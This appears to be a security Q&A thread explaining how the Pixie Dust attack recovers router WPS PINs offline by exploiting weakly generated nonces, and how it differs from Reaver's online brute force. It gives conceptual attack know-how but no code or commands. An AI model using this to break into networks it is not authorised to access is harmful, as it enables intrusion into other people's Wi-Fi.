14

I read an article on this site, but didn't get what I wanted so my concerns are:

  1. How does pixie dust attack work?
  2. What is the flaw that only certain routers contain to being vulnerable for Pixie-Dust attack?
schroeder
  • 123,438
  • 55
  • 284
  • 319
Shubham Wagh
  • 241
  • 1
  • 2
  • 11

2 Answers2

11

A Pixie-Dust attack works by bruteforcing the key for a protocol called WPS. WPS was intended to make accessing a router easier, and it did - for attackers.

A WPS Pin consists of 8 digits - two Pre-Shared-Keys or PSKs. Each PSK has half the pin. To understand how a Pixie Dust attack works, you'll need to understand how the requests to the AP work:

1. Computer sends - EAPOL Start

2. Router sends - EAP-Request for the Identity

3. Computer sends - Responds with the Identity

4. Router sends - EAP request

5. Computer sends - EAP response
...

And it loops these requests a few more times before the credentials are sent.

However, during this process, your computer has been given the following:

  • Diffie Hellman Public key of the Enrolee

  • Diffie Hellman Public key of the Registrar

  • Two hashes - of the WPS PIN

  • Enrolee nonce and a derived authkey

; Now in order to successfully bruteforce the previously mentioned PSKs, you'll need two more nonces - which are supposed to be randomly generated. And this is the most important part - since the random numbers are not really random but are derivations of the hashes (or are just zeroes) then we can bruteforce this key, even on a slow system! It will work if the implementation on the router is bad (which it is in most cases) and you should be able to find a list of vulnerable routers on the internet.

tl;dr: We bruteforce a badly generated key because of a flaw in how the random numbers are generated in many routers.

boleslaw.smialy
  • 1,627
  • 2
  • 15
  • 25
thel3l
  • 3,384
  • 11
  • 24
  • So it means it's just like reaver but bruteforce PSKs instead wps pin and is very fast? – Shubham Wagh Jan 23 '17 at 11:23
  • @ShubhamWagh Reaver *is a pixie dust attack*. You haven't understood what I said - the pin IS THE PSK. 8 digits - broken into two halves and hashed. We hash possibilities until they match and find the pin. – thel3l Jan 23 '17 at 11:25
  • 1
    @ShubhamWagh - you may want to do a little homework on the basics of networking before breaking into WPS bruteforce - it'll help you not join the masses of skiddies out there. – thel3l Jan 23 '17 at 11:26
  • Oh ok thanks I will do but last question , So pixie dust just name for brute forcing WPS? – Shubham Wagh Jan 23 '17 at 11:28
  • @ShubhamWagh PD is the name of the technique. Reaver is the tool. – thel3l Jan 23 '17 at 11:36
  • 2
    Here you have a very explicative pdf about it, done by Dominique Bongard http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf – OscarAkaElvis Jan 23 '17 at 13:51
  • 1
    Bit late, but for anyone caring about the difference, reaver abuses an error code, and bruteforces against the acces point. Pixie captures a derivative of the key and bruteforces it locally. – J.A.K. Sep 04 '17 at 16:46
  • main difference is Reaver is basically online brute force attack - it is asking AP for every try and based on APs response it knows if the PIN is correct or not. Pixie Dust is offline attack - you just need the hashes from first try and then you can brute force it without asking AP. Just by trying PIN combination, hashing them and comparing with the original hash. – Risinek Apr 14 '21 at 23:24
3

One of his books, Kevin D. Mitnick writes about Pixie Dust Attack:

To make connecting any new device to a home router easy, the Wi-Fi Alliance, a group of vendors eager to spread the use of Wi-Fi technologies, created WiFi protected setup (WPS). WPS was advertised as a way for anyone—I mean anyone—to securely set up a mobile device at home or in the office. In reality, though, it’s not very secure.

WPS is typically a button that you push on the router. Other methods include use of a PIN and near field communication (NFC). Simply put, you activate the WPS feature, and it communicates with any new devices you have in your home or office, automatically synchronizing them to work with your Wi-Fi network.

Sounds great. However, if the router is out in “public”—say, in your living room—then anyone can touch the WPS button and join your home network. Even without physical access, an online attacker can use brute force to guess your WPS PIN. It could take several hours, but it’s still a viable attack method, one you should protect yourself against by immediately turning off WPS on the router.

Another WPS attack method is known as Pixie Dust. This is an offline attack and affects only a few chip makers, including Ralink, Realtek, and Broadcom. Pixie Dust works by helping hackers gain access to the passwords on wireless routers. Basically the tool is very straightforward and can gain access to a device in seconds or hours depending on the complexity of the chosen or generated WPS PIN.For example, one such program, Reaver, can crack a WPS-enabled router within several hours.

Art of Invisibility by Kevin Mitnick (PDF).

To be more clear here are some helpful links about hacking tools for cracking WPS: Link #1, Link #2, Link #3.

cyberbird
  • 117
  • 8